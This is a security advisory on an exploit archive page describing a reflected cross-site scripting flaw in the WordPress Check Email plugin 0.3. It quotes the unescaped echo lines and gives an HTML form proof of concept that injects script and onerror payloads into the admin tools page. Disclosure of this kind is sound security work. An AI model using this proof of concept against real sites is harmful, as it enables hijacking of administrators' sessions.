exploit the possibilities

WordPress Check Email 0.3 Cross Site Scripting

WordPress Check Email 0.3 Cross Site Scripting
Posted Nov 20, 2016
Authored by Securify B.V., Antonis Manaras

WordPress Check Email plugin version 0.3 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 374f851d055a4d3e19c54e9422ba8001

WordPress Check Email 0.3 Cross Site Scripting

Change Mirror Download
------------------------------------------------------------------------
Cross-Site Scripting in Check Email WordPress Plugin
------------------------------------------------------------------------
Antonis Manaras, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Check Email
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160725-0009

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Check Email WordPress Plugin
version 0.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
The issue is fixed in Check Email version 0.5.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_check_email_wordpress_plugin.html

A Reflected Cross-Site Scripting vulnerability exists in the Check Email WordPress plugin. This vulnerability allows an attacker to perform any action with the privileges of the admin user. The affected code is not protected with an anti-Cross-Site Request Forgery token. Consequently, it can be exploited by luring the target user into clicking a specially crafted link or visiting a malicious website (or advertisement).

The vulnerability exists in the file check-email/check-email.php:

132: echo $_POST["checkemail_mime"];

140: echo $_POST["checkemail_type"];

148: echo $_POST["checkemail_from"];

156: echo $_POST["checkemail_cc"];


The vulnerability can be exploited using specially crafted URL parameters. In order to exploit this issue the target user must click a specially crafted link or visit a malicious website (or advertisement).


Proof of concept

<html>
<body>
<form action="http://172.16.52.198/wp-admin/tools.php?page=checkemail" method="POST">
<input type="hidden" name="checkemail_to" value="" />
<input type="hidden" name="checkemail_headers" value="custom" />
<input type="hidden" name="checkemail_mime" value=""><img src=x onerror=alert(1) />" />
<input type="hidden" name="checkemail_type" value=""><img src=x onerror=alert(2) /%3" />
<input type="hidden" name="checkemail_from" value=""><img src=x onerror=alert(3) />" />
<input type="hidden" name="checkemail_cc" value=""></textarea><script>alert(4);</script>" />
<input type="hidden" name="checkemail_break" value="\n" />
<input type="hidden" name="checkemail_go" value="Send test email" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>



------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close